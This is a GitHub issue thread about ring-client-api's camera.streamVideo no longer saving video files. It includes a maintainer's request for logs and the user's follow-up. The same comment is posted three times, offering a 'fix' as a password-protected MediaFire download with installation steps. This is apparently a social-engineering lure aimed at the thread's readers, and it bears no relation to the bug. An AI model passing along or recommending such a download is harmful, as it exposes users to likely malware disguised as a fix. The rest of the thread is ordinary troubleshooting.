### ISSUE TITLE
camera.streamVideo doesn't output any video files anymore

### ISSUE THREAD

**Issue by praveenreddy854** [dgreif/ring#1488]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Describe The Bug

Since 8-19-2024 I have noticed that I no longer receive video files from camera.streamVideo. Does anyone know what's going on.

ring-client-api version: 11.1.0
OS: Windows 11.

Note: I don't have a paid subscription to for ring. Is that a cause?

### Expected behavior

I expect the videos to be saved on device but I see nothing.

### OS

Windows 11

### Node.js Version

v20.10.0

### NPM Version

v10.2.3

### ring-client-api

v11.0.1

### Operating System

Windows

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tsightler** [comment]
Uh, ring-client-api 11.1.0 (or 11.0.1 since you write two different versions) are both over 2 years old and use streaming APIs that we've known for a while were destined to be deprecated.  Just like anything else, Ring's APIs change over time and we do our best to update ring-client-api to keep up with these changes.  You can't just stay on some old version and expect it to work forever, and certainly, if you want to open a bug, you should at least update to the latest version before doing so.

Also, you didn't provide anything that is requested when opening a bug.  If you don't want to provide details when opening a bug, please don't open one, just create a discussion.  It's incredibly frustrating as a maintainer to have people ignore all the questions and take zero effort on themselves and just open bugs with absolutely nothing to go on.

Please post logs, code examples, something, or this issue will be closed.

**Comment by tsightler** [comment]
Closing due to no response.

**Comment by praveenreddy854** [comment]
Sorry for the late response. I have tried ring-client-api  13.1.0 as well but no luck.
